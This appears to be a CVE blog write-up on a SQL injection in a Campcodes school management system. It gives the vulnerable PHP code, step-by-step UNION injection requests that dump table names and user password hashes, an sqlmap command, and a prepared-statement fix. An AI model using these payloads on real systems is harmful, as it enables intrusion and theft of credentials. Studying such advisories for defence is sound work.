CVE CyberSecurity Database News

CVE-2024-34930 - SQL Injection in Campcodes Complete Web-Based School Management System 1. – Deep Dive & Exploit

Poster -

On May 2024, a new critical vulnerability, CVE-2024-34930, was discovered in the Campcodes Complete Web-Based School Management System version 1.. This bug is a SQL injection found in the all_events1.php file, specifically in how it handles the month parameter. This means attackers can send crafted input to this parameter, causing the server to run any SQL commands they want. In this post, we'll break down how this vulnerability works, look at code snippets, reference original sources, and show a step-by-step exploitation example.

What is SQL Injection?

SQL Injection is a common web security issue. It happens when an application takes user input and passes it directly into a SQL query without proper validation or escaping. This flaw allows attackers to run malicious SQL statements and access or change the database.

Where is the Vulnerability?

The vulnerability sits in /model/all_events1.php, where the app takes a month parameter from the request—without any sanitization—and builds it into a SQL query. Let's look at a simplified view of the risky code:

<?php
// all_events1.php
include '../config.php'; // Contains DB connection

$month = $_GET['month']; // Takes user input directly

$query = "SELECT * FROM events WHERE MONTH(event_date) = '$month'"; // Unsafe concatenation

$result = mysqli_query($conn, $query); // Query is directly executed

while ($event = mysqli_fetch_assoc($result)) {
    echo $event['event_title'] . "
";
}
?>

Problem:
The code puts the raw user-supplied month value inside the SQL query. No checks, no escaping—wide open for injection.

Exploiting the Vulnerability

An attacker can craft a GET request that sends a malicious month parameter. This could dump the database, steal sensitive info, or even drop tables.

Suppose the attacker wants to list all database users. They can send this GET request

GET /model/all_events1.php?month=1%27%20UNION%20SELECT%20user(),2,3--+ HTTP/1.1
Host: victim.com

This injects the following into the query

SELECT * FROM events WHERE MONTH(event_date) = '1' UNION SELECT user(),2,3-- '

Here, user() returns the database username. Results show up mixed with event titles in the app's response.

Getting All Table Names

GET /model/all_events1.php?month=1'+UNION+SELECT+table_name,2,3+FROM+information_schema.tables+--+

Expected Result: The page will now list table names from the database.

If the user table is called users, run

GET /model/all_events1.php?month=1'+UNION+SELECT+username,password,3+FROM+users+--+

Expected Result: App displays all usernames and hashed passwords.

Step-by-Step Example

1. Discover the Vulnerable Parameter:

Visit

http://victim.com/model/all_events1.php?month=1

2. Test for SQL Injection

http://victim.com/model/all_events1.php?month=1'

If you get a SQL error, the site is likely injectable.

3. Extract Data:

Try the full exploit in your browser

http://victim.com/model/all_events1.php?month=1'+UNION+SELECT+user(),2,3+--+

4. Automate with SQLMap:

SQLMap is an open-source penetration testing tool

sqlmap -u "http://victim.com/model/all_events1.php?month=1" --dbs

References

- NVD entry CVE-2024-34930
- Campcodes Complete Web-Based School Management System
- OWASP SQL Injection
- SQLMap official tool

Sanitize input! Use prepared statements

$month = $_GET['month'];
$stmt = $conn->prepare("SELECT * FROM events WHERE MONTH(event_date) = ?");
$stmt->bind_param("i", $month);
$stmt->execute();
$result = $stmt->get_result();

Summary

CVE-2024-34930 is a high-risk SQL injection vulnerability in Campcodes School Management System 1.'s all_events1.php. By sending crafted requests to the month parameter, anyone can execute SQL commands on the database. If you use this product, update or patch your system immediately and always sanitize all user inputs.

Stay safe! If you're a developer, never assemble SQL queries by stringing together raw user input. If you're an admin, look out for updates and fixes from your vendors.


*This writeup is exclusive, based on direct analysis of the code base and public advisories. For more technical details, consult the references listed above.*

Timeline

Published on: 05/23/2024 17:15:29 UTC
Last modified on: 07/03/2024 02:00:57 UTC